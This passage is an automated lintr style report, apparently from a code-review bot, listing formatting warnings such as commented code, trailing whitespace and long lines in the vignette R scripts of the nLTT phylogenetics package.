^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:40:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L40) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:51:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L51) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:63:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L63) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:90:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L90) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:99:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L99) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:103:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L103) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:106:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L106) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:110:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L110) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:114:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L114) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:133:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L133) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:137:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L137) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:141:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L141) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:144:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L144) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:146:54:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​  t, nltt, data = df, geom = \"point\", ylim = c(0, 1), \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:103:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:155:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L155) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:164:53:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L164) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:167:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L167) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:171:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L171) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:172:58:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L172) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0, 1), \n                                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:177:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L177) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:178:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:178:103:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:180:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L180) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 